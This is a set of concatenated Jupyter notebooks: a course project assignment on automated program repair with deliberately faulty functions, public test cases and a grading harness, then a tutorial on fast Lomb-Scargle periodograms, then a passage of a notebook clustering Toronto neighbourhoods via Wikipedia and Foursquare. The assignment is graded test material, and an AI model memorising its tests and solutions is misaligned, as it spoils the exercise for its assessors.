# Next, let us use _statistical debugging_ to identify likely faulty locations. The `OchiaiDebugger` ranks individual code lines by how frequently they are executed in failing runs (and not in passing runs).
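# The Ochiai suspiciousness score behind this ranking has a simple closed form; a minimal sketch (the variable names are illustrative):
#
# ```python
def ochiai(failed_with_line, passed_with_line, total_failed):
    """Ochiai suspiciousness of a line: the number of failing runs that
    execute it, normalised by the geometric mean of the total number of
    failing runs and the number of runs that execute the line."""
    import math
    covered = failed_with_line + passed_with_line
    if failed_with_line == 0 or covered == 0:
        return 0.0
    return failed_with_line / math.sqrt(total_failed * covered)

ochiai(100, 0, 100)   # 1.0 -- covered by every failing run and no passing run
ochiai(50, 50, 100)   # 0.5
ochiai(0, 100, 100)   # 0.0 -- covered only by passing runs
# ```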
# + slideshow={"slide_type": "fragment"}
larger_debugger = OchiaiDebugger()
# + slideshow={"slide_type": "fragment"}
for x, y in LARGER_PASSING_TESTCASES + LARGER_FAILING_TESTCASES:
    with larger_debugger:
        larger_test(x, y)
# + [markdown] slideshow={"slide_type": "fragment"}
# Given the results of statistical debugging, we can now use the *Repairer* introduced in the book to repair our function. Here we use the default implementation which is initialized with the simple _StatementMutator_ mutator.
# + slideshow={"slide_type": "skip"}
from Repairer import Repairer
from Repairer import ConditionMutator, CrossoverOperator
from Repairer import DeltaDebugger
# + slideshow={"slide_type": "subslide"}
repairer = Repairer(larger_debugger, log=True)
# + slideshow={"slide_type": "subslide"}
best_tree, fitness = repairer.repair() # type: ignore
# + [markdown] slideshow={"slide_type": "subslide"}
# The *Repairer* successfully produced a fix.
# + [markdown] slideshow={"slide_type": "slide"}
# ## Implementation
#
# As stated above, the goal of this project is to implement a repairer capable of producing a fix to the functions defined in *the Evaluation section*, as well as secret functions.
# To do this, you need to work with the _Repairer_ class from the book.
# The _Repairer_ class is highly configurable, making it easy to update and plug in various components: the fault localization (pass a different debugger that is a subclass of `DifferenceDebugger`), the mutation operator (set `mutator_class` to a subclass of `StatementMutator`), the crossover operator (set `crossover_class` to a subclass of `CrossoverOperator`), and the reduction algorithm (set `reducer_class` to a subclass of `Reducer`). You may change any of these components or make other changes at will.
# + [markdown] slideshow={"slide_type": "subslide"}
# For us to be able to test your implementation, you will have to implement the `debug_and_repair()` function defined here.
# + slideshow={"slide_type": "skip"}
import astor
# + slideshow={"slide_type": "skip"}
from bookutils import print_content, show_ast
# + slideshow={"slide_type": "subslide"}
def debug_and_repair(f, testcases, test_function, log=False):
'''
Debugs a function with the given testcases and the test_function
and tries to repair it afterwards.
Parameters
----------
f : function
The faulty function, to be debugged and repaired
testcases : List
A list that includes test inputs for the function under test
test_function : function
A function that takes the test inputs and tests whether the
function under test produces the correct output.
log: bool
Turn logging on/off.
Returns
-------
str
The repaired version of f as a string.
'''
# TODO: implement this function
return None
# + [markdown] slideshow={"slide_type": "subslide"}
# The function `debug_and_repair()` is where everything needs to be implemented. We will provide you with the function to be repaired, as well as test cases for this function and a test function. Let us show you how the function can be used and how it should behave:
# + slideshow={"slide_type": "fragment"}
random.seed(42)
# + slideshow={"slide_type": "subslide"}
def simple_debug_and_repair(f, testcases, function_test,
log=False):
'''
Debugs a function with the given testcases and the test_function
and tries to repair it afterwards.
Parameters
----------
f : function
The faulty function, to be debugged and repaired
testcases : List
A list that includes test inputs for the function under test
    function_test : function
        A function that takes the test inputs and tests whether the
function under test produces the correct output.
log: bool
Turn logging on/off.
Returns
-------
str
The repaired version of f as a string.
'''
debugger = OchiaiDebugger()
for i in testcases:
with debugger:
function_test(*i) # Ensure that you use *i here.
repairer = Repairer(debugger,
mutator_class=ConditionMutator,
crossover_class=CrossoverOperator,
reducer_class=DeltaDebugger,
log=log)
# Ensure that you specify a sufficient number of
# iterations to evolve.
best_tree, fitness = repairer.repair(iterations=100) # type: ignore
return astor.to_source(best_tree)
# + [markdown] slideshow={"slide_type": "subslide"}
# Here we again used the _Ochiai_ statistical debugger and the _Repairer_ described in [The Debugging Book](https://www.debuggingbook.org/beta/html/Repairer.html). In contrast to the initial example, now we used another type of mutator – `ConditionMutator`. It can successfully fix the `larger` function as well.
# + slideshow={"slide_type": "fragment"}
repaired = simple_debug_and_repair(larger,
LARGER_PASSING_TESTCASES +
LARGER_FAILING_TESTCASES,
larger_test, False)
print_content(repaired, '.py')
# + [markdown] slideshow={"slide_type": "subslide"}
# Although `simple_debug_and_repair` produced a correct solution for our example, it does not generalize to other functions.
# So your task is to create the `debug_and_repair()` function which can be applied on any faulty function.
# + [markdown] slideshow={"slide_type": "fragment"}
# Apart from the function `debug_and_repair()`, you may of course implement your own classes. Make sure, however, that you use these classes within `debug_and_repair()`. Also, keep in mind to tune the _iterations_ parameter of the `Repairer` so that it has a sufficient number of generations to evolve. As it may take too much time to find a solution for an ill-programmed repairer (e.g., consider an infinite `while` loop introduced in the fix), we impose a _10-minute timeout_ for each repair.
# + [markdown] slideshow={"slide_type": "slide"}
# ## Evaluation
# + [markdown] slideshow={"slide_type": "fragment"}
# Having you implement `debug_and_repair()` allows us to easily test your solution: we call the function with the respective arguments and check the correctness of its output. In this section, we provide you with some test cases as well as the testing framework for this project. This will help you assess the quality of your work.
#
# We define functions as well as test-case generators for these functions. The functions given here should be considered **public tests**. If you pass all public tests without hard-coding the solutions, you are guaranteed to achieve **10 points**. The secret tests for the remaining 10 must-have points have similar defects.
# + [markdown] slideshow={"slide_type": "subslide"}
# ### Factorial
#
# The first function we implement is a _factorial_ function. It is supposed to compute the following formula:
# \begin{equation*}
# n! = \textit{factorial}(n) = \prod_{k=1}^{n}k, \quad \text{for $k\geq 1$}
# \end{equation*}
# + [markdown] slideshow={"slide_type": "fragment"}
# Here we define three faulty functions `factorial1`, `factorial2`, and `factorial3` that are supposed to compute the factorial.
# + slideshow={"slide_type": "subslide"}
def factorial1(n):
res = 1
for i in range(1, n):
res *= i
return res
# + [markdown] slideshow={"slide_type": "fragment"}
# At first sight, `factorial1` looks correctly implemented, yet it produces the wrong answer:
# + slideshow={"slide_type": "fragment"}
factorial1(5)
# + [markdown] slideshow={"slide_type": "fragment"}
# while the correct value for 5! is 120.
# + slideshow={"slide_type": "fragment"}
def factorial_testcase():
n = random.randrange(100)
return n
# + slideshow={"slide_type": "subslide"}
def factorial1_test(n):
m = factorial1(n)
assert m == math.factorial(n)
# + slideshow={"slide_type": "fragment"}
def factorial_passing_testcase(): # type: ignore
while True:
try:
n = factorial_testcase()
_ = factorial1_test(n)
return (n,)
except AssertionError:
pass
# + slideshow={"slide_type": "subslide"}
def factorial_failing_testcase(): # type: ignore
while True:
try:
n = factorial_testcase()
_ = factorial1_test(n)
except AssertionError:
return (n,)
# + slideshow={"slide_type": "fragment"}
FACTORIAL_PASSING_TESTCASES_1 = [factorial_passing_testcase() for i in range(TESTS)]
# + slideshow={"slide_type": "fragment"}
FACTORIAL_FAILING_TESTCASES_1 = [factorial_failing_testcase() for i in range(TESTS)]
# + [markdown] slideshow={"slide_type": "fragment"}
# As we can see, our simple Repairer cannot produce a fix. (Or more precisely, the "fix" it produces is pretty much pointless.)
# + slideshow={"slide_type": "subslide"}
repaired = \
simple_debug_and_repair(factorial1,
FACTORIAL_PASSING_TESTCASES_1 +
FACTORIAL_FAILING_TESTCASES_1,
factorial1_test, True)
# + [markdown] slideshow={"slide_type": "subslide"}
# The problem is that the current `Repairer` does not provide a suitable mutation for the defective part of the code.
#
# How can we repair this? Consider extending the `StatementMutator` operator such that it can mutate various parts of the code, such as ranges, arithmetic operations, variable names, etc. (For a reference on how to do this, look at the `ConditionMutator` class.)
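As a self-contained sketch of this idea (independent of the book's `StatementMutator` machinery), an `ast.NodeTransformer` can rewrite arithmetic operators in place; a full solution would wrap such a transformation in a mutator subclass and pick mutation targets from the statistical-debugging ranking. The class name `AugOpMutator` below is ours, not part of the book's API, and we use the standard-library `ast.unparse()` (Python 3.9+) instead of `astor` to regenerate source code.

```python
import ast

class AugOpMutator(ast.NodeTransformer):
    """Swap '+=' and '*=' -- one of many possible arithmetic mutations."""
    def visit_AugAssign(self, node):
        if isinstance(node.op, ast.Add):
            node.op = ast.Mult()
        elif isinstance(node.op, ast.Mult):
            node.op = ast.Add()
        return node

source = """
def factorial3(n):
    res = 1
    for i in range(1, n + 1):
        res += i
    return res
"""

# Parse, mutate, and regenerate the source code
tree = AugOpMutator().visit(ast.parse(source))
mutated = ast.unparse(tree)
print(mutated)  # 'res += i' has become 'res *= i'
```

Applied at the statement that Ochiai ranks highest, this particular mutation directly repairs `factorial3()` defined below.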
# + [markdown] slideshow={"slide_type": "fragment"}
# The next faulty function is `factorial2()`:
# + slideshow={"slide_type": "fragment"}
def factorial2(n):
i = 1
for i in range(1, n + 1):
i *= i
return i
# + [markdown] slideshow={"slide_type": "fragment"}
# Again, it outputs the incorrect answer:
# + slideshow={"slide_type": "subslide"}
factorial2(5)
# + slideshow={"slide_type": "fragment"}
def factorial2_test(n):
m = factorial2(n)
assert m == math.factorial(n)
# + slideshow={"slide_type": "fragment"}
def factorial_passing_testcase(): # type: ignore
while True:
try:
n = factorial_testcase()
_ = factorial2_test(n)
return (n,)
except AssertionError:
pass
# + slideshow={"slide_type": "subslide"}
def factorial_failing_testcase(): # type: ignore
while True:
try:
n = factorial_testcase()
_ = factorial2_test(n)
except AssertionError:
return (n,)
# + slideshow={"slide_type": "fragment"}
FACTORIAL_PASSING_TESTCASES_2 = [factorial_passing_testcase()
for i in range(TESTS)]
# + slideshow={"slide_type": "fragment"}
FACTORIAL_FAILING_TESTCASES_2 = [factorial_failing_testcase()
for i in range(TESTS)]
# + [markdown] slideshow={"slide_type": "fragment"}
# The third faulty function is `factorial3()`:
# + slideshow={"slide_type": "subslide"}
def factorial3(n):
res = 1
for i in range(1, n + 1):
res += i
return res
# + slideshow={"slide_type": "fragment"}
factorial3(5)
# + slideshow={"slide_type": "fragment"}
def factorial3_test(n):
m = factorial3(n)
assert m == math.factorial(n)
# + slideshow={"slide_type": "subslide"}
def factorial_passing_testcase(): # type: ignore
while True:
try:
n = factorial_testcase()
_ = factorial3_test(n)
return (n,)
except AssertionError:
pass
# + slideshow={"slide_type": "fragment"}
def factorial_failing_testcase(): # type: ignore
while True:
try:
n = factorial_testcase()
_ = factorial3_test(n)
except AssertionError:
return (n,)
# + slideshow={"slide_type": "subslide"}
FACTORIAL_PASSING_TESTCASES_3 = [factorial_passing_testcase()
for i in range(TESTS)]
# + slideshow={"slide_type": "fragment"}
FACTORIAL_FAILING_TESTCASES_3 = [factorial_failing_testcase()
for i in range(TESTS)]
# + [markdown] slideshow={"slide_type": "subslide"}
# ### Middle
#
# The following faulty function is the already well known _Middle_ function, though with another defect.
# + slideshow={"slide_type": "subslide"}
def middle(x, y, z):
if x < x:
if y < z:
return y
if x < z:
return z
return x
if x < z:
return x
if y < z:
return z
return y
# + [markdown] slideshow={"slide_type": "fragment"}
# It should return the second largest number of the input, but it does not:
# + slideshow={"slide_type": "subslide"}
middle(2, 3, 1)
# + slideshow={"slide_type": "fragment"}
def middle_testcase():
x = random.randrange(10)
y = random.randrange(10)
z = random.randrange(10)
return x, y, z
# + slideshow={"slide_type": "fragment"}
def middle_test(x, y, z):
m = middle(x, y, z)
assert m == sorted([x, y, z])[1]
# + slideshow={"slide_type": "subslide"}
def middle_passing_testcase():
while True:
try:
x, y, z = middle_testcase()
_ = middle_test(x, y, z)
return x, y, z
except AssertionError:
pass
# + slideshow={"slide_type": "fragment"}
def middle_failing_testcase():
while True:
try:
x, y, z = middle_testcase()
_ = middle_test(x, y, z)
except AssertionError:
return x, y, z
# + slideshow={"slide_type": "subslide"}
MIDDLE_PASSING_TESTCASES = [middle_passing_testcase()
for i in range(TESTS)]
# + slideshow={"slide_type": "fragment"}
MIDDLE_FAILING_TESTCASES = [middle_failing_testcase()
for i in range(TESTS)]
# + [markdown] slideshow={"slide_type": "subslide"}
# ### Power
#
# The power function should implement the following formula:
# \begin{equation*}
# \textit{power}(x, n) = x^n, \quad \text{for $x\geq 0$ and $n \geq 0$}
# \end{equation*}
# + slideshow={"slide_type": "fragment"}
def power(x, n):
res = 1
for i in range(0, x):
res *= n
return res
# + [markdown] slideshow={"slide_type": "fragment"}
# However, this `power()` function either has an uncommon interpretation of $x^n$ – or it is simply wrong:
# + slideshow={"slide_type": "subslide"}
power(2, 5)
# + [markdown] slideshow={"slide_type": "fragment"}
# We go with the simpler explanation that `power()` is wrong. The correct value, of course, should be $2^5 = 32$.
# + slideshow={"slide_type": "fragment"}
def power_testcase():
x = random.randrange(100)
n = random.randrange(100)
return x, n
# + slideshow={"slide_type": "fragment"}
def power_test(x, n):
m = power(x, n)
assert m == pow(x, n)
# + slideshow={"slide_type": "subslide"}
def power_passing_testcase():
while True:
try:
x, n = power_testcase()
_ = power_test(x, n)
return x, n
except AssertionError:
pass
# + slideshow={"slide_type": "fragment"}
def power_failing_testcase():
while True:
try:
x, n = power_testcase()
_ = power_test(x, n)
except AssertionError:
return x, n
# + slideshow={"slide_type": "subslide"}
POWER_PASSING_TESTCASES = [power_passing_testcase()
for i in range(TESTS)]
# + slideshow={"slide_type": "fragment"}
POWER_FAILING_TESTCASES = [power_failing_testcase()
for i in range(TESTS)]
# + [markdown] slideshow={"slide_type": "subslide"}
# ### Tester Class
# + [markdown] slideshow={"slide_type": "fragment"}
# To make it convenient to test your solution, we provide a testing framework:
# + slideshow={"slide_type": "skip"}
import re
# + slideshow={"slide_type": "subslide"}
class Test:
def __init__(self, function, testcases,
test_function, assert_function):
self.function = function
self.testcases = testcases
self.test_function = test_function
self.assert_function = assert_function
def run(self, repair_function):
repaired = repair_function(self.function,
self.testcases,
self.test_function)
repaired = re.sub(self.function.__name__, 'foo', repaired)
exec(repaired, globals())
for test in self.testcases:
res = foo(*test)
assert res == self.assert_function(*test)
# + slideshow={"slide_type": "subslide"}
def middle_assert(x, y, z):
return sorted([x, y, z])[1]
# + slideshow={"slide_type": "fragment"}
test0 = Test(factorial1, FACTORIAL_PASSING_TESTCASES_1 + FACTORIAL_FAILING_TESTCASES_1, factorial1_test, math.factorial)
test1 = Test(factorial2, FACTORIAL_PASSING_TESTCASES_2 + FACTORIAL_FAILING_TESTCASES_2, factorial2_test, math.factorial)
test2 = Test(factorial3, FACTORIAL_PASSING_TESTCASES_3 + FACTORIAL_FAILING_TESTCASES_3, factorial3_test, math.factorial)
test3 = Test(middle, MIDDLE_PASSING_TESTCASES + MIDDLE_FAILING_TESTCASES, middle_test, middle_assert)
test4 = Test(power, POWER_PASSING_TESTCASES + POWER_FAILING_TESTCASES, power_test, pow)
# + slideshow={"slide_type": "fragment"}
tests = [test0, test1, test2, test3, test4]
# + slideshow={"slide_type": "subslide"}
class Tester:
def __init__(self, function, tests):
self.function = function
self.tests = tests
random.seed(42) # We use this seed for our evaluation; don't change it.
def run_tests(self):
for test in self.tests:
try:
test.run(self.function)
print(f'Test {test.function.__name__}: OK')
except AssertionError:
print(f'Test {test.function.__name__}: Failed')
# + slideshow={"slide_type": "subslide"}
tester = Tester(simple_debug_and_repair, tests) # TODO: replace simple_debug_and_repair by your debug_and_repair function
tester.run_tests()
# + [markdown] slideshow={"slide_type": "fragment"}
# By executing the `Tester` as shown above, you can assess the quality of your repair approach by testing your own `debug_and_repair()` function.
# + [markdown] slideshow={"slide_type": "slide"}
# ## Grading
#
# Your project will be graded by _automated tests_. The tests are executed in the same manner as shown above.
# In total there are **20 points** + **10 bonus points** to be awarded for this project. **20 points** for the must-haves, **10 bonus points** for may-haves.
# + [markdown] slideshow={"slide_type": "subslide"}
# ### Must-Haves (20 points)
#
# Must-haves include an implementation of the `debug_and_repair()` function such that it automatically repairs faulty functions, given sufficiently large test suites.
# **10 points** are awarded for passing the tests in this notebook; each passing test is worth two points.
# **10 points** are awarded for passing secret tests.
# + [markdown] slideshow={"slide_type": "subslide"}
# ### May-Haves (10 points)
#
# May-haves will also be tested with secret tests and award **2 points** each. The may-have feature for this project is a more robust implementation that is able to cope with a wider range of defects:
#
# * Infinite loops
# * Infinite recursion (`RecursionError` in Python)
# * Type errors (`TypeError` in Python)
# * Undefined identifiers (`NameError` in Python)
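One way to cope with the first two defect classes is to guard each test execution with a timeout, treating a hanging candidate like a failing test. The sketch below uses `signal.alarm` and therefore works on Unix only; the `Timeout` class and `run_test_guarded` function are our own illustrative names, not part of the book's API.

```python
import signal

class Timeout:
    """Context manager that raises TimeoutError after `seconds` (Unix only)."""
    def __init__(self, seconds):
        self.seconds = seconds

    def _handler(self, signum, frame):
        raise TimeoutError(f"timed out after {self.seconds}s")

    def __enter__(self):
        self.old_handler = signal.signal(signal.SIGALRM, self._handler)
        signal.alarm(self.seconds)
        return self

    def __exit__(self, *args):
        signal.alarm(0)  # cancel any pending alarm
        signal.signal(signal.SIGALRM, self.old_handler)
        return False

def run_test_guarded(test, args, seconds=1):
    """Run test(*args); report hangs and crashes as failures."""
    try:
        with Timeout(seconds):
            test(*args)
        return True
    except (AssertionError, TimeoutError, RecursionError,
            TypeError, NameError):
        return False
```

With such a guard, a candidate fix that introduces an infinite loop or infinite recursion simply counts as failing its tests instead of stalling the whole repair run.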
# + [markdown] slideshow={"slide_type": "subslide"}
# ### General Rules
#
# You need to achieve at least **10 points** to be awarded any points at all.
# Tests must be passed without hard-coding results, otherwise no points are awarded.
# Your code needs to be sufficiently documented in order to achieve points!
|
notebooks/Repairing_Code.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Fast Lomb-Scargle Periodograms in Python
#
# The Lomb-Scargle Periodogram is a well-known method of finding periodicity in irregularly-sampled time-series data.
# The common implementation of the periodogram is relatively slow: for $N$ data points, a frequency grid of $\sim N$ frequencies is required and the computation scales as $O[N^2]$.
# In a 1989 paper, Press and Rybicki presented a faster technique which makes use of fast Fourier transforms to reduce this cost to $O[N\log N]$ on a regular frequency grid.
# The ``gatspy`` package implements this in the ``LombScargleFast`` object, which we'll explore below.
#
# But first, we'll motivate *why* this algorithm is needed at all.
# We'll start this notebook with some standard imports:
# +
# %matplotlib inline
import numpy as np
import matplotlib.pyplot as plt
# use seaborn's default plotting styles for matplotlib
import seaborn; seaborn.set()
# -
# To begin, let's make a function which will create $N$ noisy, irregularly-spaced data points containing a periodic signal, and plot one realization of that data:
# +
def create_data(N, period=2.5, err=0.1, rseed=0):
rng = np.random.RandomState(rseed)
t = np.arange(N, dtype=float) + 0.3 * rng.randn(N)
y = np.sin(2 * np.pi * t / period) + err * rng.randn(N)
return t, y, err
t, y, dy = create_data(100, period=20)
plt.errorbar(t, y, dy, fmt='o');
# -
# From this, our algorithm should be able to identify any periodicity that is present.
# ## Choosing the Frequency Grid
# The Lomb-Scargle Periodogram works by evaluating a power for a set of candidate frequencies $f$. So the first question is, how many candidate frequencies should we choose?
# It turns out that this question is *very* important. If you choose the frequency spacing poorly, it may lead you to miss a strong periodic signal in the data!
# ### Frequency spacing
# First, let's think about the frequency spacing we need in our grid. If you're asking about a candidate frequency $f$, then data with range $T$ contains $T \cdot f$ complete cycles. If our error in frequency is $\delta f$, then $T\cdot\delta f$ is the error in number of cycles between the endpoints of the data.
# If this error is a significant fraction of a cycle, this will cause problems. This gives us the criterion
# $$
# T\cdot\delta f \ll 1
# $$
# Commonly, we'll choose some oversampling factor around 5 and use $\delta f = (5T)^{-1}$ as our frequency grid spacing.
# ### Frequency limits
# Next, we need to choose the limits of the frequency grid. On the low end, $f=0$ would be a natural choice, but it can cause problems in practice – so we'll go one step up and use $\delta f$ as our minimum frequency.
# But on the high end, we need to make a choice: what's the highest frequency we'd trust our data to be sensitive to?
# At this point, many people are tempted to mis-apply the Nyquist-Shannon sampling theorem, and choose some version of the Nyquist limit for the data.
# But this is entirely wrong! The Nyquist frequency applies for regularly-sampled data, but irregularly-sampled data can be sensitive to much, much higher frequencies, and the upper limit should be determined based on what kind of signals you are looking for.
#
# Still, a common (if dubious) rule-of-thumb is that the high frequency is some multiple of what Press & Rybicki call the "average" Nyquist frequency,
# $$
# \hat{f}_{Ny} = \frac{N}{2T}
# $$
# With this in mind, we'll use the following function to determine a suitable frequency grid:
def freq_grid(t, oversampling=5, nyquist_factor=3):
T = t.max() - t.min()
N = len(t)
df = 1. / (oversampling * T)
fmax = 0.5 * nyquist_factor * N / T
N = int(fmax // df)
return df + df * np.arange(N)
# Now let's use the ``gatspy`` tools to plot the periodogram:
t, y, dy = create_data(100, period=2.5)
freq = freq_grid(t)
print(len(freq))
from gatspy.periodic import LombScargle
model = LombScargle().fit(t, y, dy)
period = 1. / freq
power = model.periodogram(period)
plt.plot(period, power)
plt.xlim(0, 5);
# The algorithm finds a strong signal at a period of 2.5.
#
# To demonstrate explicitly that the Nyquist rate doesn't apply in irregularly-sampled data, let's use a period below the averaged sampling rate and show that we can find it:
# +
t, y, dy = create_data(100, period=0.3)
period = 1. / freq_grid(t, nyquist_factor=10)
model = LombScargle().fit(t, y, dy)
power = model.periodogram(period)
plt.plot(period, power)
plt.xlim(0, 1);
# -
# With a data sampling rate of approximately $1$ time unit, we easily find a period of $0.3$ time units. The averaged Nyquist limit clearly does not apply for irregularly-spaced data!
# Nevertheless, short of a full analysis of the temporal window function, it remains a useful milepost in estimating the upper limit of frequency.
# ### Scaling with $N$
# With these rules in mind, we see that the size of the frequency grid is approximately
# $$
# N_f = \frac{f_{max}}{\delta f} \propto \frac{N/(2T)}{1/T} \propto N
# $$
# So for $N$ data points, we will require some multiple of $N$ frequencies (with a constant of proportionality typically on order 10) to suitably explore the frequency space.
# This is the source of the $N^2$ scaling of the typical periodogram: finding periods in $N$ datapoints requires a grid of $\sim 10N$ frequencies, and $O[N^2]$ operations.
# When $N$ gets very, very large, this becomes a problem.
# ## Fast Periodograms with ``LombScargleFast``
# Finally we get to the meat of this discussion.
#
# In a [1989 paper](http://adsabs.harvard.edu/full/1989ApJ...338..277P), Press and Rybicki proposed a clever method whereby a Fast Fourier Transform is used on a grid *extirpolated* from the original data, such that this problem can be solved in $O[N\log N]$ time. The ``gatspy`` package contains a pure-Python implementation of this algorithm, and we'll explore it here.
# If you're interested in seeing how the algorithm works in Python, check out the code in [the gatspy source](https://github.com/astroML/gatspy/blob/master/gatspy/periodic/lomb_scargle_fast.py).
# It's far more readable and understandable than the Fortran source presented in Press *et al.*
#
# For convenience, the implementation has a ``periodogram_auto`` method which automatically selects a frequency/period range based on an oversampling factor and a Nyquist factor:
from gatspy.periodic import LombScargleFast
help(LombScargleFast.periodogram_auto)
# +
from gatspy.periodic import LombScargleFast
t, y, dy = create_data(100)
model = LombScargleFast().fit(t, y, dy)
period, power = model.periodogram_auto()
plt.plot(period, power)
plt.xlim(0, 5);
# -
# Here, to illustrate the different computational scalings, we'll evaluate the computational time for a number of inputs, using ``LombScargleAstroML`` (a fast implementation of the $O[N^2]$ algorithm) and ``LombScargleFast``, which is the fast FFT-based implementation:
# +
from time import time
from gatspy.periodic import LombScargleAstroML, LombScargleFast
def get_time(N, Model):
t, y, dy = create_data(N)
model = Model().fit(t, y, dy)
t0 = time()
model.periodogram_auto()
t1 = time()
result = t1 - t0
    # for fast operations, repeat the measurement several times and take the median
    if result < 0.1:
        n_repeats = min(50, int(0.5 / result))
        times = []
        for i in range(n_repeats):
            t0 = time()
            model.periodogram_auto()
            t1 = time()
            times.append(t1 - t0)
        result = np.median(times)
return result
N_obs = list(map(int, 10 ** np.linspace(1, 4, 5)))
times1 = [get_time(N, LombScargleAstroML) for N in N_obs]
times2 = [get_time(N, LombScargleFast) for N in N_obs]
# -
plt.loglog(N_obs, times1, label='Naive Implementation')
plt.loglog(N_obs, times2, label='FFT Implementation')
plt.xlabel('N observations')
plt.ylabel('t (sec)')
plt.legend(loc='upper left');
# For fewer than 100 observations, the naive implementation wins out, but as the number of points grows, we observe the clear trends in scaling: $O[N^2]$ for the Naive method, and $O[N\log N]$ for the fast method. We could push this plot higher, but the trends are already clear: for $10^5$ points, while the FFT method would complete in a couple seconds, the Naive method would take nearly two hours! Who's got the time for that plot?
|
examples/FastLombScargle.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# Parse table from Wikipedia webpage
# + pycharm={"name": "#%%\n"}
import pandas as pd # library for data analysis
from bs4 import BeautifulSoup # library to parse web pages
import requests # library to handle requests
import csv
import folium # map rendering library
from sklearn.cluster import KMeans
import numpy as np
# Matplotlib and associated plotting modules
import matplotlib.cm as cm
import matplotlib.colors as colors
# + [markdown] pycharm={"name": "#%% md\n"}
# get credentials from local file
# + pycharm={"name": "#%%\n"}
from credentials import CLIENT_ID, CLIENT_SECRET, VERSION, LIMIT
# + pycharm={"name": "#%%\n"}
coordinate_data = {}
with open('Geospatial_Coordinates.csv') as in_file:
data = csv.DictReader(in_file)
for row in data:
coordinate_data[row['Postal Code']] = {'longitude': row['Longitude'],
'latitude': row['Latitude']}
def get_coordinates(postal_code):
ret = coordinate_data.get(postal_code, {})
latitude = ret.get('latitude')
longitude = ret.get('longitude')
return longitude, latitude
# + pycharm={"name": "#%%\n"}
def get_data_from_wikipedia(url):
req = requests.get(url)
soup = BeautifulSoup(req.content, 'html.parser')
#print(soup.prettify())
data = []
table = soup.find('table', attrs={'class':'wikitable sortable'})
table_body = table.find('tbody')
#print(table_body)
# get the headers of the table and store in a list
table_headers = []
headers = table_body.find_all('th')
for header in headers:
header_value = header.get_text().strip()
table_headers.append(header_value)
row_key_remapping = {'Neighborhood': 'Neighbourhood'}
# get the rows of the table
rows = table_body.find_all('tr')
for row in rows:
row_data = {}
cells = row.find_all('td')
for position, cell in enumerate(cells):
value = cell.get_text().strip()
key = table_headers[position]
key = row_key_remapping[key] if key in row_key_remapping else key
# add the value to a dictionary
row_data[key] = value
# check that there is some data and that Borough is not unassigned
if row_data and row_data.get('Borough', '') != 'Not assigned':
data.append(row_data)
return data
def load_data_into_dataframe(data):
df = pd.DataFrame(data)
# rename the postal code heading
df.rename(columns={"Postal Code": "PostalCode",
"Neighborhood": "Neighbourhood"},
inplace=True)
return df
def add_coordinates(df):
longitude = []
latitude = []
for index, row in df.iterrows():
postal_code = row.get('PostalCode')
row_long, row_lat = get_coordinates(postal_code=postal_code)
longitude.append(float(row_long))
latitude.append(float(row_lat))
df['Latitude'] = latitude
df['Longitude'] = longitude
return df
def getNearbyVenues(names, latitudes, longitudes, radius=500):
venues_list=[]
for name, lat, lng in zip(names, latitudes, longitudes):
url = 'https://api.foursquare.com/v2/venues/explore?&client_id={}&client_secret={}&v={}&ll={},{}&radius={}&limit={}'.format(
CLIENT_ID,
CLIENT_SECRET,
VERSION,
lat,
lng,
radius,
LIMIT)
print(url)
results = requests.get(url).json()["response"]['groups'][0]['items']
venues_list.append([(
name,
lat,
lng,
v['venue']['name'],
v['venue']['location']['lat'],
v['venue']['location']['lng'],
v['venue']['categories'][0]['name']) for v in results])
nearby_venues = pd.DataFrame([item for venue_list in venues_list for item in venue_list])
    # use the 'Neighbourhood' spelling consistently; later code groups on it
    nearby_venues.columns = ['Neighbourhood',
                             'Neighbourhood Latitude',
                             'Neighbourhood Longitude',
                             'Venue',
                             'Venue Latitude',
                             'Venue Longitude',
                             'Venue Category']
return nearby_venues
def process_url(url):
data = get_data_from_wikipedia(url=url)
df = load_data_into_dataframe(data=data)
df = add_coordinates(df=df)
nearby_venues = getNearbyVenues(names=df['Neighbourhood'],
latitudes=df['Latitude'],
longitudes=df['Longitude'])
print('There are {} uniques categories.'.format(len(nearby_venues['Venue Category'].unique())))
    # work on a copy so the helper 'count' column does not leak into nearby_venues
    temp_nearby_venues = nearby_venues.copy()
    temp_nearby_venues['count'] = np.zeros(len(temp_nearby_venues))
venue_counts = temp_nearby_venues.groupby(['Neighbourhood', 'Venue Category']).count()
print(venue_counts[(venue_counts['count'] > 2)])
onehot = pd.get_dummies(nearby_venues[['Venue Category']], prefix="", prefix_sep="")
# add neighborhood column back to dataframe
onehot['Neighbourhood'] = nearby_venues['Neighbourhood']
grouped = onehot.groupby('Neighbourhood').mean().reset_index()
print(grouped.head())
return df, grouped
# function to sort the venues in descending order
def return_most_common_venues(row, num_top_venues):
row_categories = row.iloc[1:]
row_categories_sorted = row_categories.sort_values(ascending=False)
return row_categories_sorted.index.values[0:num_top_venues]
def top_10_sorted(grouped):
num_top_venues = 10
indicators = ['st', 'nd', 'rd']
# create columns according to number of top venues
columns = ['Neighbourhood']
for ind in np.arange(num_top_venues):
try:
columns.append('{}{} Most Common Venue'.format(ind+1, indicators[ind]))
except:
columns.append('{}th Most Common Venue'.format(ind+1))
# create a new dataframe
neighborhoods_venues_sorted = pd.DataFrame(columns=columns)
neighborhoods_venues_sorted['Neighbourhood'] = grouped['Neighbourhood']
for ind in np.arange(grouped.shape[0]):
neighborhoods_venues_sorted.iloc[ind, 1:] = return_most_common_venues(grouped.iloc[ind, :], num_top_venues)
neighborhoods_venues_sorted.head()
return neighborhoods_venues_sorted
def cluster_and_merge(df, grouped, neighborhoods_venues_sorted):
# set number of clusters
kclusters = 5
    grouped_clustering = grouped.drop('Neighbourhood', axis=1)
# run k-means clustering
kmeans = KMeans(n_clusters=kclusters, random_state=0).fit(grouped_clustering)
# check cluster labels generated for each row in the dataframe
#kmeans.labels_[0:10]
# add clustering labels
neighborhoods_venues_sorted.insert(0, 'Cluster Labels', kmeans.labels_)
    location_merged = df
    # merge the sorted venue rankings into df to add the cluster label for each neighbourhood
    location_merged = location_merged.join(neighborhoods_venues_sorted.set_index('Neighbourhood'), on='Neighbourhood')
    location_merged.head()
return location_merged
def plot_clusters(df, kclusters=5):
    df = df.dropna()
